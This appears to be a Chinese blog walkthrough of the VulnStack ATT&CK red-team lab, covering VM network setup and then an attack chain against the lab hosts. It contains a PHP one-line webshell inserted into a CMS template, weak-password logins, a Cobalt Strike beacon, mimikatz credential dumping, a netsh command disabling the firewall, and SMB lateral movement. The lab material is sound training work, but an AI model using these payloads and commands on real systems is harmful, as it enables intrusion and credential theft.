Loading

VulnStack靶机练习

ATT&CK红队评估一

镜像下载

镜像下载地址

网络配置

网络拓扑图

VMware 网络配置

使用 VMware 的『虚拟网络编辑器』添加两个虚拟网络。

虚拟网络名称 网段 DHCP
VMnet3 192.168.72.0/24
VMnet4 192.168.52.0/24

虚拟机网络配置

虚拟机 网段 虚拟网络接口
Windows 7 x64 192.168.72.0/24,192.168.52.0/24 VMnet3,VMnet4
Win2K3 Metasploitable 192.168.52.0/24 VMnet4
Windows Server 2008 R2 x64 192.168.52.0/24 VMnet4
Kali(用于攻击的机器) 192.168.72.0/24 VMnet3

虚拟机配置

Windows 7 x64

开机后登录系统,密码为 hongrisec@2019

打开网络适配器,可以看到有两个网络连接,其中『本地连接4』的网段为 192.168.52.0/24,我们修改『本地连接』的网段为 192.168.72.0/24

在弹出的对话框中选择『公用网络』,将该网络连接设置为公用网络。

然后进入 C:\phpStudy,运行 phpStudy.exe

检查一下网络配置:

ipconfig | findstr "192.168"

Win2K3 Metasploitable

开机后登录系统,密码为 hongrisec@2019,首次登录要求修改密码,可以统一修改为 hongrisec@2022

登录后查看本机 IP 是否正常。

ipconfig

Windows Server 2008 R2 x64

开机后登录系统,密码为 hongrisec@2019,首次登录要求修改密码,可以统一修改为 hongrisec@2022

登录后查看本机 IP 是否正常。

ipconfig

至此环境部署完成。

靶机练习

信息收集

使用 nmap 进行端口扫描。

nmap -Pn -p- -sV 192.168.72.143

发现 80 端口开放,直接访问一下,发现是一个 phpStudy 的探针。

直接尝试 MySQL 弱口令( root/root )。

既然已经知道 MySQL 密码,直接登录 phpMyAdmin

检查一下能否写文件:

SHOW VARIABLES LIKE '%secure_file_priv%'

发现不能写文件,所以不能直接写入 WebShell。

浏览一下数据库,发现存在一个数据库 newyxcms

很可能存在一个 cms 程序,所以尝试访问 http://192.168.72.143/newyxcms/http://192.168.72.143/yxcms/ ,发现 http://192.168.72.143/yxcms/ 成功访问。

直接找到后台登录入口 http://192.168.72.143/yxcms/index.php?r=admin/index/login,尝试一下弱口令 admin/123456,登录成功。

漏洞利用

发现『全局设置 -> 前台模板』可以插入 PHP 代码,修改 index_index.php,插入一句话木马。

<?php eval($_POST['cmd']); ?>

使用蚁剑连接一下。

横向移动

查看用户信息:

查看域信息:

查看内网其他机器。

arp -a

上传一个木马。

在虚拟终端中运行木马:

.\artifact.exe

Cobalt Strike 中看到目标上线。

使用 mimikatz 抓一下密码。

mimikatz sekurlsa::logonpasswords

查看内网其他机器:

net view

关闭防火墙:

# 查看防火墙状态
netsh firewall show state
# 关闭防火墙
shell netsh advfirewall set allprofiles state off

提权:

可以看到目标中多了一个 SYSTEM

进入 SYSTEM beacon,抓取密码。

logonpasswords

查看域内机器。

net view

此时可以看到目标多了机器。

新建一个监听器,payload 选择 SMB。

横向移动:

上线成功,同样的操作可以把所有域内机器上线。

待续。

posted @ 2022-03-21 11:01  土豆分米猪  阅读(152)  评论(0编辑  收藏  举报